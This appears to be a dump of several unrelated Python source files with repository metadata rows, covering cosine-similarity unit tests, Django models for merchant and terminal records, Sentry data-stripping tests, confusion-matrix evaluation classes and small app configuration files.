        s2 = self.ilist[1]
        cosine_sim = cosine(s1, s2)
        self.assertAlmostEqual(cosine_sim, 0.378, places=3)
        cosine_sim = cosine(('g', 'h', 'd', 'd'), s2)
        self.assertAlmostEqual(cosine_sim, 0.267, places=3)

    def test_cosine_na(self):
        cosine = CosineSetSimilarity(self.ilist)
        cosine_sim = cosine(self.ilist[0], ())
        assert numpy.isnan(cosine_sim)

    def test_cosine_identical(self):
        cosine = CosineSetSimilarity(self.ilist)
        cosine_sim = cosine(self.ilist[0], self.ilist[0])
        self.assertAlmostEqual(cosine_sim, 1, places=5)

    def test_cosine_cache(self):
        cosine = CosineSetSimilarity(self.ilist)
        s1 = self.ilist[0]
        s2 = self.ilist[1]
        cosine_sim = cosine(s1, s2)
        self.assertAlmostEqual(cosine_sim, 0.378, places=3)
        cosine_sim = cosine(s1, s2)
        self.assertAlmostEqual(cosine_sim, 0.378, places=3)

    def test_cosine_no_corpus(self):
        cosine = CosineSetSimilarity([])
        s1 = self.ilist[0]
        s2 = self.ilist[1]
        cosine_sim = cosine(s1, s2)
        self.assertAlmostEqual(cosine_sim, 0.667, places=3)
        cosine_sim = cosine(('g', 'h', 'd'), s2)
        self.assertAlmostEqual(cosine_sim, 0.333, places=3)

    def test_cosine_pickle(self):
        cosine = CosineSetSimilarity(self.ilist)
        s1 = self.ilist[0]
        s2 = self.ilist[1]
        cosine_sim = cosine(s1, s2)
        pickle.dumps(cosine)

        cosine = CosineSetSimilarity([])
        s1 = self.ilist[0]
        s2 = self.ilist[1]
        cosine_sim = cosine(s1, s2)
        pickle.dumps(cosine)


class TestTextCosineClass(unittest.TestCase):

    def setUp(self):
        self.ilist = ['a b c',
                      'b c d',
                      'd e f']

    def test_cosine(self):
        cosine = CosineTextSimilarity(self.ilist)
        s1 = self.ilist[0]
        s2 = self.ilist[1]
        cosine_sim = cosine(s1, s2)
        self.assertAlmostEqual(cosine_sim, 0.378, places=3)

    def test_cosine_na(self):
        cosine = CosineTextSimilarity(self.ilist)
        cosine_sim = cosine(self.ilist[0], '')
        assert numpy.isnan(cosine_sim)

    def test_cosine_identical(self):
        cosine = CosineTextSimilarity(self.ilist)
        cosine_sim = cosine(self.ilist[0], self.ilist[0])
        self.assertAlmostEqual(cosine_sim, 1, places=5)
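
# Note: the constructor corpus changes the weighting. With the three-document
# corpus, cosine('a b c', 'b c d') scores ~0.378, while with an empty corpus
# the same pair scores the raw 2/3 overlap (compare test_cosine_no_corpus).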

if __name__ == '__main__':
    unittest.main()
| 32.606742 | 76 | 0.592695 | 348 | 2,902 | 4.801724 | 0.146552 | 0.150808 | 0.116697 | 0.16158 | 0.868342 | 0.844405 | 0.844405 | 0.804309 | 0.77319 | 0.77319 | 0 | 0.040865 | 0.283253 | 2,902 | 88 | 77 | 32.977273 | 0.7625 | 0 | 0 | 0.662162 | 0 | 0 | 0.013439 | 0 | 0 | 0 | 0 | 0 | 0.148649 | 1 | 0.148649 | false | 0 | 0.054054 | 0 | 0.22973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
517a4f88be2cb85f0585fc7d2ff2eebe916d794c | 6,923 | py | Python | myapi/models.py | akhm7/atm-managment-system | 50639ac8bc2a7e21aa3828c3bae2fb2e6b0bd6bf | [
"Apache-2.0"
] | null | null | null | myapi/models.py | akhm7/atm-managment-system | 50639ac8bc2a7e21aa3828c3bae2fb2e6b0bd6bf | [
"Apache-2.0"
] | null | null | null | myapi/models.py | akhm7/atm-managment-system | 50639ac8bc2a7e21aa3828c3bae2fb2e6b0bd6bf | [
"Apache-2.0"
] | null | null | null | from django.db import models
from datetime import datetime, timezone
import json
class RequestData(models.Model):
createdAt = models.DateTimeField("Создан", auto_now_add = True)
method = models.TextField("Метод", blank = True, null = True)
scheme = models.TextField("Схема", blank = True, null = True)
headers = models.TextField("Заголовок", blank = True, null = True)
request = models.TextField("Запрос", blank = True, null = True)
endpoint = models.CharField("API", max_length=255, blank = True, null = True)
class Meta:
verbose_name = "Запросы"
verbose_name_plural = "Запросы"
def __str__(self):
temp = json.loads(self.request)
value = "None"
if 'data' in temp:
if 'MERCHANT' in temp["data"][0]:
value = temp["data"][0]["MERCHANT"]
elif 'TERMINAL_ID' in temp["data"][0]:
value = temp["data"][0]["TERMINAL_ID"]
else:
value = "None"
return value
class RegtseData(models.Model):
MERCHANT = models.CharField("MERCHANT", max_length=255, blank = False, null = False)
PARENT = models.CharField("PARENT", max_length=255, blank = True, null = True)
ABRV_NAME = models.CharField("ABRV_NAME", max_length=255, blank = True, null = True)
FULL_NAME = models.CharField("FULL_NAME", max_length=255, blank = True, null = True)
CNTRY = models.CharField("CNTRY", max_length=255, blank = True, null = True)
CITY = models.CharField("CITY", max_length=255, blank = True, null = True)
STREET = models.CharField("STREET", max_length=255, blank = True, null = True)
REG_NR = models.CharField("REG_NR", max_length=255, blank = True, null = True)
PHONE = models.CharField("PHONE", max_length=255, blank = True, null = True)
MCC = models.CharField("MCC", max_length=255, blank = True, null = True)
POST_IND = models.CharField("POST_IND", max_length=255, blank = True, null = True)
MRC_PHONE = models.CharField("MRC_PHONE", max_length=255, blank = True, null = True)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS",default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Мерчанты"
verbose_name_plural = "Мерчанты"
def __str__(self):
return self.MERCHANT
class RegdevData(models.Model):
TERMINAL_ID = models.CharField("Terminal Id", max_length=255, blank = False, null = False)
ACCEPTOR_ID = models.CharField("Acceptor Id", max_length=255, blank = False, null = False)
TERM_TYPE = models.CharField("Type", max_length=255, blank = True, null = True)
POINT_CODE = models.CharField("Point Code", max_length=255, blank = True, null = True)
SERIAL_NR = models.CharField("Serial Number", max_length=255, blank = True, null = True)
INV_NR = models.CharField("Inventory Number", max_length=255, blank = True, null = True)
CURRENCY = models.CharField("Currency", max_length=255, blank = True, null = True)
regtseId = models.ForeignKey(related_name='regtseId', to=RegtseData, on_delete=models.CASCADE)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS", default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Устройства"
verbose_name_plural = "Устройства"
def __str__(self):
return self.TERMINAL_ID
class RequestDataTest(models.Model):
createdAt = models.DateTimeField("Создан", auto_now_add = True)
method = models.TextField("Метод", blank = True, null = True)
scheme = models.TextField("Схема", blank = True, null = True)
headers = models.TextField("Заголовок", blank = True, null = True)
request = models.TextField("Запрос", blank = True, null = True)
endpoint = models.CharField("API", max_length=255, blank = True, null = True)
class Meta:
verbose_name = "Запросы (test)"
verbose_name_plural = "Запросы (test)"
def __str__(self):
temp = json.loads(self.request)
value = "None"
if 'data' in temp:
if 'MERCHANT' in temp["data"][0]:
value = temp["data"][0]["MERCHANT"]
elif 'TERMINAL_ID' in temp["data"][0]:
value = temp["data"][0]["TERMINAL_ID"]
else:
value = "None"
return value
class RegtseDataTest(models.Model):
MERCHANT = models.CharField("MERCHANT", max_length=255, null = False)
PARENT = models.CharField("PARENT", max_length=255, null = False)
ABRV_NAME = models.CharField("ABRV_NAME", max_length=255, blank = True, null = True)
FULL_NAME = models.CharField("FULL_NAME", max_length=255, blank = True, null = True)
CNTRY = models.CharField("CNTRY", max_length=255, blank = True, null = True)
CITY = models.CharField("CITY", max_length=255, blank = True, null = True)
STREET = models.CharField("STREET", max_length=255, blank = True, null = True)
REG_NR = models.CharField("REG_NR", max_length=255, blank = True, null = True)
PHONE = models.CharField("PHONE", max_length=255, blank = True, null = True)
MCC = models.CharField("MCC", max_length=255, blank = True, null = True)
POST_IND = models.CharField("POST_IND", max_length=255, blank = True, null = True)
MRC_PHONE = models.CharField("MRC_PHONE", max_length=255, blank = True, null = True)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS",default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Мерчанты (test)"
verbose_name_plural = "Мерчанты (test)"
def __str__(self):
return self.MERCHANT
class RegdevDataTest(models.Model):
    TERMINAL_ID = models.CharField("Terminal Id", max_length=255, blank=False, null=False)
    ACCEPTOR_ID = models.CharField("Acceptor Id", max_length=255, blank=False, null=False)
    TERM_TYPE = models.CharField("Type", max_length=255, blank=True, null=True)
    POINT_CODE = models.CharField("Point Code", max_length=255, blank=True, null=True)
    SERIAL_NR = models.CharField("Serial Number", max_length=255, blank=True, null=True)
    INV_NR = models.CharField("Inventory Number", max_length=255, blank=True, null=True)
    CURRENCY = models.CharField("Currency", max_length=255, blank=True, null=True)
    regtseId = models.ForeignKey(related_name='regtseId', to=RegtseDataTest, on_delete=models.CASCADE)
    req = models.TextField("req", blank=True, null=True)
    status = models.BooleanField("STATUS", default=False)
    dt = models.DateTimeField("dt", default=datetime.now)  # callable, not datetime.now()

    class Meta:
        verbose_name = "Devices (test)"
        verbose_name_plural = "Devices (test)"

    def __str__(self):
        return self.TERMINAL_ID
| 48.076389 | 102 | 0.662141 | 874 | 6,923 | 5.098398 | 0.115561 | 0.090889 | 0.131284 | 0.171679 | 0.922801 | 0.920781 | 0.918986 | 0.88465 | 0.88465 | 0.838869 | 0 | 0.023239 | 0.204391 | 6,923 | 144 | 103 | 48.076389 | 0.785766 | 0 | 0 | 0.77686 | 0 | 0 | 0.101675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049587 | false | 0 | 0.024793 | 0.033058 | 0.752066 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
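The `default=datetime.now()` calls fixed above are a classic Django pitfall: the parentheses make the expression evaluate once at import time, so every row silently shares the same timestamp. A minimal sketch of the safer pattern, assuming a project with `USE_TZ` enabled (the `Event` model name is illustrative, not from this record):

from django.db import models
from django.utils import timezone  # timezone-aware replacement for datetime.now


class Event(models.Model):
    # Django resolves a callable default per instance, so each new
    # Event gets a fresh timestamp.
    created = models.DateTimeField(default=timezone.now)

    # Anti-pattern for comparison: timezone.now() here would be evaluated
    # exactly once, when this module is first imported.
    # created = models.DateTimeField(default=timezone.now())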
51bbdff774c8762a8d2bcec1375d9bddd776fc8f | 1,172 | py | Python | tests/test_sentry_helper.py | jqueguiner/ai-django-core | 25a1ab4c8fff6a3183d3346d5eb7a8636014c48a | ["MIT"] | null | null | null | tests/test_sentry_helper.py | jqueguiner/ai-django-core | 25a1ab4c8fff6a3183d3346d5eb7a8636014c48a | ["MIT"] | null | null | null | tests/test_sentry_helper.py | jqueguiner/ai-django-core | 25a1ab4c8fff6a3183d3346d5eb7a8636014c48a | ["MIT"] | null | null | null |
from django.test import TestCase
from ai_django_core.sentry.helpers import strip_sensitive_data_from_sentry_event


class SentryHelperTest(TestCase):
    def test_strip_sensitive_data_from_sentry_event_regular(self):
        event = {'user': {'email': 'mymail@example.com', 'ip_address': '127.0.0.1', 'username': 'my-user'}}
        self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)

    def test_strip_sensitive_data_from_sentry_event_missing_key_email(self):
        event = {'user': {'ip_address': '127.0.0.1', 'username': 'my-user'}}
        self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)

    def test_strip_sensitive_data_from_sentry_event_missing_key_ip_address(self):
        event = {'user': {'email': 'mymail@example.com', 'username': 'my-user'}}
        self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)

    def test_strip_sensitive_data_from_sentry_event_missing_key_username(self):
        event = {'user': {'email': 'mymail@example.com', 'ip_address': '127.0.0.1'}}
        self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)
| 43.407407 | 107 | 0.746587 | 159 | 1,172 | 5.09434 | 0.220126 | 0.155556 | 0.2 | 0.244444 | 0.834568 | 0.834568 | 0.793827 | 0.751852 | 0.702469 | 0.702469 | 0 | 0.01763 | 0.12884 | 1,172 | 26 | 108 | 45.076923 | 0.77571 | 0 | 0 | 0.266667 | 0 | 0 | 0.159556 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 1 | 0.266667 | false | 0 | 0.133333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
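The helper under test accepts the `(event, hint)` pair that Sentry passes to a `before_send` hook, which suggests it is meant to be registered at SDK initialization. A hedged sketch of that wiring (the DSN is a placeholder, and that ai-django-core expects exactly this hookup is an assumption drawn from the signature):

import sentry_sdk
from ai_django_core.sentry.helpers import strip_sensitive_data_from_sentry_event

sentry_sdk.init(
    dsn="https://examplePublicKey@o0.ingest.sentry.io/0",  # placeholder DSN
    # Sentry calls this with (event, hint) before each event is sent,
    # letting the helper strip email/ip_address/username from the payload.
    before_send=strip_sensitive_data_from_sentry_event,
)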
51f6e94c8edd436bf3279edcdbdce5297a655648 | 1,745 | py | Python | evaluations/confusion_matrix.py | sfvnDTU/deep_detektor | 3413b805b1d108480358a3f50ec5bb18b1d6845b | ["MIT"] | 3 | 2017-10-23T13:29:56.000Z | 2018-04-23T09:03:57.000Z | evaluations/confusion_matrix.py | sfvnDTU/deep_detektor | 3413b805b1d108480358a3f50ec5bb18b1d6845b | ["MIT"] | 1 | 2017-10-30T15:32:54.000Z | 2017-10-30T17:32:54.000Z | evaluations/confusion_matrix.py | sfvnDTU/deep_detektor | 3413b805b1d108480358a3f50ec5bb18b1d6845b | ["MIT"] | null | null | null |
from evaluations.evaluation_base import Evaluation
import numpy as np


class TruePositives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum(np.array(y_true) * np.array(y_pred_binary))

    def name(self):
        return "TP"


class TrueNegatives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum((1 - np.array(y_true)) * (1 - np.array(y_pred_binary)))

    def name(self):
        return "TN"


class FalsePositives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum((1 - np.array(y_true)) * np.array(y_pred_binary))

    def name(self):
        return "FP"


class FalseNegatives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum(np.array(y_true) * (1 - np.array(y_pred_binary)))

    def name(self):
        return "FN"


class PredictedPositives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum(np.array(y_pred_binary))

    def name(self):
        return "PredP"


class PredictedNegatives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum(1 - np.array(y_pred_binary))

    def name(self):
        return "PredN"


class DataPositives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum(np.array(y_true))

    def name(self):
        return "DataP"


class DataNegatives(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return sum(1 - np.array(y_true))

    def name(self):
        return "DataN"


class Samples(Evaluation):
    def __call__(self, y_true, y_pred, y_pred_binary):
        return len(y_true)

    def name(self):
        return "Samples"
| 23.266667 | 74 | 0.66361 | 252 | 1,745 | 4.230159 | 0.154762 | 0.11257 | 0.154784 | 0.177298 | 0.750469 | 0.750469 | 0.729831 | 0.729831 | 0.697936 | 0.672608 | 0 | 0.004422 | 0.22235 | 1,745 | 74 | 75 | 23.581081 | 0.781135 | 0 | 0 | 0.382979 | 0 | 0 | 0.020057 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.382979 | false | 0 | 0.042553 | 0.382979 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
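These nine evaluations are the raw cells and margins of a binary confusion matrix, and precision/recall fall out of them directly. A minimal sketch assuming 0/1 label lists are acceptable inputs (the `Evaluation` base class is not included in this record, so the argument-free constructors are inferred from the subclasses; `y_pred` is unused by these counts, hence the None):

y_true = [1, 0, 1, 1, 0]
y_pred_binary = [1, 0, 0, 1, 1]

tp = TruePositives()(y_true, None, y_pred_binary)   # 2
fp = FalsePositives()(y_true, None, y_pred_binary)  # 1
fn = FalseNegatives()(y_true, None, y_pred_binary)  # 1

precision = tp / (tp + fp)  # 2/3: fraction of flagged items that were real positives
recall = tp / (tp + fn)     # 2/3: fraction of real positives that were flagged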
5c613d86c0de17dafe7d2afba418b328ecaf3410 | 129 | py | Python | platform/core/polyaxon/api/utils/serializers/build.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | ["Apache-2.0"] | null | null | null | platform/core/polyaxon/api/utils/serializers/build.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | ["Apache-2.0"] | null | null | null | platform/core/polyaxon/api/utils/serializers/build.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | ["Apache-2.0"] | null | null | null |
class BuildMixin(object):
    def get_build_job(self, obj):
        return obj.build_job.unique_name if obj.build_job else None
| 25.8 | 67 | 0.736434 | 21 | 129 | 4.285714 | 0.714286 | 0.266667 | 0.244444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 129 | 4 | 68 | 32.25 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
7aad3b2a5a54896e51d2db957ce307491b4b68d5 | 71 | py | Python | scripts/utility/__init__.py | jjbrophy47/tree_deletion | 97041d129da335de3018b3243bc81943088abf24 | ["Apache-2.0"] | 1 | 2020-07-16T22:25:48.000Z | 2020-07-16T22:25:48.000Z | scripts/utility/__init__.py | jjbrophy47/tree_deletion | 97041d129da335de3018b3243bc81943088abf24 | ["Apache-2.0"] | null | null | null | scripts/utility/__init__.py | jjbrophy47/tree_deletion | 97041d129da335de3018b3243bc81943088abf24 | ["Apache-2.0"] | null | null | null |
from . import data_util
from . import exp_util
from . import print_util
| 23.666667 | 24 | 0.802817 | 12 | 71 | 4.5 | 0.5 | 0.555556 | 0.518519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15493 | 71 | 3 | 24 | 23.666667 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8fb7d8b97cd80a6309c3167a0c7ec890c7be5548 | 148 | py | Python | rest_framework_discovery/apps.py | ztroop/djangorestframework-discovery | a040eec861ff752e2981bc162ad7a18aa271f17a | ["BSD-3-Clause"] | 1 | 2018-04-23T22:40:58.000Z | 2018-04-23T22:40:58.000Z | rest_framework_discovery/apps.py | ztroop/djangorestframework-discovery | a040eec861ff752e2981bc162ad7a18aa271f17a | ["BSD-3-Clause"] | 6 | 2021-04-08T21:58:45.000Z | 2022-02-10T12:55:06.000Z | rest_framework_discovery/apps.py | ztroop/djangorestframework-discovery | a040eec861ff752e2981bc162ad7a18aa271f17a | ["BSD-3-Clause"] | null | null | null |
from django.apps import AppConfig  # pragma: no cover


class DiscoveryConfig(AppConfig):  # pragma: no cover
    name = "rest_framework_discovery"
| 24.666667 | 53 | 0.756757 | 18 | 148 | 6.111111 | 0.777778 | 0.272727 | 0.309091 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168919 | 148 | 5 | 54 | 29.6 | 0.894309 | 0.222973 | 0 | 0 | 0 | 0 | 0.214286 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
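An `AppConfig` like this only takes effect once the app is listed in a project's settings. A minimal sketch of the consumer side (the settings fragment is illustrative, not taken from this repository):

# settings.py (fragment)
INSTALLED_APPS = [
    "django.contrib.contenttypes",
    "django.contrib.auth",
    "rest_framework",
    # Django resolves this label to DiscoveryConfig via the app's apps.py.
    "rest_framework_discovery",
]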